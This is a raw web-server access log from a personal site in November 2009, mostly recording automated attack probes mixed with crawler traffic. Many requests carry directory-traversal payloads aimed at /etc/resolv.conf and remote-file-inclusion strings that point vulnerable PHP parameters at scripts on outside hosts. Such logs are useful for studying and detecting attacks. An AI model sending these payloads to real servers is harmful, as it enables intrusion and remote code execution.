78.108.57.125 - - [20/Nov/2009:10:56:50 -0800] "GET /logs//index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:51 -0800] "GET /logs//index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:51 -0800] "GET /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 15936 "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:51 -0800] "GET /logs/access_080830.log%20//index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:51 -0800] "GET /logs//index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:51 -0800] "GET /logs/access_080830.log%20//index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:52 -0800] "GET /logs/access_080830.log%20//index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:52 -0800] "GET /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 15939 "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:56:54 -0800] "GET /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 15932 "-" "-" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:56:56 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.13.192.37 - - [20/Nov/2009:10:56:58 -0800] "GET /retreat1_21980.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
66.249.68.200 - - [20/Nov/2009:10:57:02 -0800] "GET /blog/wp-content/gallery/2008-yuma/021_0.jpg HTTP/1.1" 200 487194 "-" "Googlebot-Image/1.0" "dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:57:05 -0800] "GET /logs/access_091005.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:57:15 -0800] "GET /logs/access_090911.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:57:20 -0800] "GET /logs/access_090113.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:57:40 -0800] "GET /logs/access_080111.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.13.192.36 - - [20/Nov/2009:10:57:54 -0800] "GET /retreat1_21982.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:58:04 -0800] "GET /logs/access_091005.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [20/Nov/2009:10:58:56 -0800] "GET /logs/access_080611.log//config/dbutil.bck.php?confdir=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:11:00:04 -0800] "GET /logs/access_090911.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:11:00:04 -0800] "GET /logs/access_090113.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [20/Nov/2009:11:00:18 -0800] "GET /logs/access_090521.log//config/dbutil.bck.php?confdir=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:01:25 -0800] "GET /logs/access_071228.log%20%20/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:11:01:52 -0800] "GET /logs/access_090130.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:11:01:52 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:11:01:52 -0800] "GET /logs/access_090124.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:11:01:53 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 15898 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:01:55 -0800] "GET /logs/access_080701.log%20%20/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:11:02:25 -0800] "GET /logs/access_081121.log%20//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:11:02:25 -0800] "GET /logs/access_090623.log%20//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:02:57 -0800] "GET /index.php?url=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 16305 "-" "-" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:03:06 -0800] "GET /logs/access_090706.log HTTP/1.0" 200 2623522 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:03:09 -0800] "GET /logs/access_091007.log HTTP/1.0" 200 2778201 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:04:58 -0800] "GET /logs/access_090308.log/?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:04:58 -0800] "GET /logs/?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 126786 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:04:59 -0800] "GET /?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 15947 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:05:27 -0800] "GET /?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 15946 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:05:27 -0800] "GET /logs/access_090308.log/?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:05:28 -0800] "GET /logs/?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 200 126786 "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:31 -0800] "GET /ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:32 -0800] "GET /logs/access_090303.log%20//ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:32 -0800] "GET /ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:33 -0800] "GET /ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:33 -0800] "GET /logs//ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:33 -0800] "GET /logs/access_090303.log%20//ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:34 -0800] "GET /logs/access_090303.log%20//ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:34 -0800] "GET /logs//ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:05:35 -0800] "GET /logs//ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:11:05:51 -0800] "GET /logs/access_081121.log%20//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:11:05:51 -0800] "GET /logs/access_090623.log%20//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:11:06:08 -0800] "GET /logs/access_090527.log%20%20/modules/My_eGallery/index.php?basepath=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:11:06:08 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:11:06:08 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:06:41 -0800] "GET /logs/access_090308.log%20%20/?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:43 -0800] "GET /logs/access_090326.log//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:43 -0800] "GET /logs/access_091103.log//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:44 -0800] "GET /logs//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126795 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:45 -0800] "GET /logs/access_091103.log%20%20//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/Nov/2009:11:06:45 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:45 -0800] "GET /logs/access_090326.log%20%20//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:45 -0800] "GET /logs//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126795 "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:11:06:46 -0800] "GET /logs/access_090228.log%20%20/modules/My_eGallery/index.php?basepath=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:46 -0800] "GET /////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15938 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:06:46 -0800] "GET /////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15938 "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:06:53 -0800] "GET /genlib.php?cms[tngpath]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:06:55 -0800] "GET /genlib.php?cms[tngpath]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:06:55 -0800] "GET /genlib.php?cms[tngpath]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:07:10 -0800] "GET /logs/access_090326.log//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:07:10 -0800] "GET /////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15937 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:07:10 -0800] "GET /logs//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126795 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:07:12 -0800] "GET /logs/access_091103.log//////?_zb_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.216.213.119 - - [20/Nov/2009:11:07:32 -0800] "GET /logs/access_090308.log%20%20/?page=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:07:40 -0800] "GET /logs/access_080821.log%20//png.php?include_path=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:07:40 -0800] "GET /png.php?include_path=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:07:40 -0800] "GET /logs//png.php?include_path=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:07:43 -0800] "GET /logs/access_081011.log%20//png.php?include_path=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:23 -0800] "GET /blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:25 -0800] "GET /blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:25 -0800] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:25 -0800] "GET /logs/access_081202.log//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:25 -0800] "GET /logs/access_080330.log//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:26 -0800] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:26 -0800] "GET /logs/access_080330.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:08:26 -0800] "GET /logs/access_081202.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.179.121 - - [20/Nov/2009:11:08:51 -0800] "GET /logs/access_090308.log/?page=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.55.179.121 - - [20/Nov/2009:11:08:52 -0800] "GET /logs/?page=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 126786 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.55.179.121 - - [20/Nov/2009:11:08:52 -0800] "GET /?page=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 15947 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.55.179.121 - - [20/Nov/2009:11:09:08 -0800] "GET /logs/access_090308.log/?page=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.179.121 - - [20/Nov/2009:11:09:08 -0800] "GET /?page=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 15946 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.179.121 - - [20/Nov/2009:11:09:09 -0800] "GET /logs/?page=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 126786 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:09:14 -0800] "GET /blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:09:14 -0800] "GET /logs/access_080601.log//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:09:14 -0800] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:10:01 -0800] "GET /logs/access_090101.log//blend_data/blend_common.php?phpbb_root_path=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:10:19 -0800] "GET /logs//index.php?url=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:19 -0800] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:19 -0800] "GET /path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:19 -0800] "GET /logs/access_081012.log%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:10:19 -0800] "GET /logs/access_080626.log%20//index.php?url=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:20 -0800] "GET /path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:20 -0800] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:20 -0800] "GET /logs/access_081012.log%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:20 -0800] "GET /logs/access_090305.log%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:29 -0800] "GET /logs/access_081012.log%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:29 -0800] "GET /path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:29 -0800] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:33 -0800] "GET /logs/access_090305.log%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:11:10:34 -0800] "GET /logs/access_090305.log%20%20//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:11:11:41 -0800] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:11:11:41 -0800] "GET /logs/access_090124.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.237 - - [20/Nov/2009:11:12:03 -0800] "GET /blog/index.php/2009/10/24/ HTTP/1.0" 200 15969 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [20/Nov/2009:11:12:06 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.0" 200 10083 "http://dmulk.com/blog/2009/10/24/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:12:07 -0800] "GET /logs/access_081227.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:12:07 -0800] "GET /logs/access_081130.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:12:07 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
